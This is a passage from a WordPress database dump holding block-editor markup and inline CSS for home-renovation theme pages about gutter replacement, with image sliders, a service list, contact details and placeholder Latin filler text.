255, 255, 0) 100%); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8c9e0ac6-d876-416a-b243-cf53e086ab36 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"d204557b-2856-4858-9f1e-44166c4c7311\"} -->\n<style type=\"text/css\"> .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d204557b-2856-4858-9f1e-44166c4c7311 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d204557b-2856-4858-9f1e-44166c4c7311\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"a832934f-ab08-4930-a2bd-ee3f588a4e9d\"} -->\n<style type=\"text/css\"> .block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-a832934f-ab08-4930-a2bd-ee3f588a4e9d is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>You’re one step away from connecting with a specialist who can complete your Gutter Replacement project.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><li>Submit one easy form.</li><li>Connect with a local specialist.</li><li>Get a quick quote.</li><li>Enjoy your completed home project.</li></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Dunrite Roofing And Siding Based in Northern Oakland County We have served Northern Oakland County and the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Call (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Fill out our contact form <a href=\"https://cteisys.com/contact-layout-1/\">here.</a> We will get back with you soon.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Gutters','','publish','closed','closed','','gutters','','','2022-08-23 19:09:38','2022-08-23 19:09:38','',160,'https://sktperfectdemo.com/themepack/gbrenovate/?page_id=229',0,'page','',0),(428,1,'2022-08-23 18:09:34','2022-08-23 18:09:34','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"db3fc478-1e17-4b3a-a716-13344f9e6690\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-db3fc478-1e17-4b3a-a716-13344f9e6690 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-db3fc478-1e17-4b3a-a716-13344f9e6690 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db3fc478-1e17-4b3a-a716-13344f9e6690.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ca193fef-40c6-45db-9cb5-bd651dcaeacc\"} -->\n<style type=\"text/css\"> .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ca193fef-40c6-45db-9cb5-bd651dcaeacc .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ca193fef-40c6-45db-9cb5-bd651dcaeacc skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"cf17220e-f4d6-4ae6-916b-7443f7483c2f\"} -->\n<style type=\"text/css\"> .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cf17220e-f4d6-4ae6-916b-7443f7483c2f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cf17220e-f4d6-4ae6-916b-7443f7483c2f\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"0cb880bb-8643-4209-a6cc-115212c50ad3\"} -->\n<style type=\"text/css\"> .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0cb880bb-8643-4209-a6cc-115212c50ad3 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0cb880bb-8643-4209-a6cc-115212c50ad3\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"01f0da2e-d4f9-4e36-9a52-97c027439fab\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-01f0da2e-d4f9-4e36-9a52-97c027439fab {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-01f0da2e-d4f9-4e36-9a52-97c027439fab\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Gutter Replacement </h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1 id=\"headline\">In need of gutter replacement in Saginaw? Our gutter replacement specialists are ready to help. Why<strong> Us?</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><strong>Professional Service</strong></li><li><strong>Gutter Replacement</strong></li><li><strong>Gutter Installation</strong></li><li><strong>All Types of Gutters</strong></li><li><strong>All Material Types</strong></li><li><strong>Downspout Services</strong></li><li><strong>Gutter Covers &amp; Leaf Guards</strong></li><li><strong>High Customer Satisfaction</strong></li><li><strong>Residential and Commercial Service</strong></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"35f3b882-a96a-4182-be6f-1c6bdb4d72e1\"} -->\n<style type=\"text/css\"> .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-35f3b882-a96a-4182-be6f-1c6bdb4d72e1 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"264037b9-5df4-468c-811d-8b3c0b40d53c\"} -->\n<style type=\"text/css\"> .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-264037b9-5df4-468c-811d-8b3c0b40d53c .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-264037b9-5df4-468c-811d-8b3c0b40d53c\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"e7c79c75-dbee-4db9-a78e-ab428612139b\"} -->\n<style type=\"text/css\"> .block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-e7c79c75-dbee-4db9-a78e-ab428612139b .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-e7c79c75-dbee-4db9-a78e-ab428612139b is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0a850fcc-c7cf-45d0-b803-6269cf9549f0\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0a850fcc-c7cf-45d0-b803-6269cf9549f0 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; 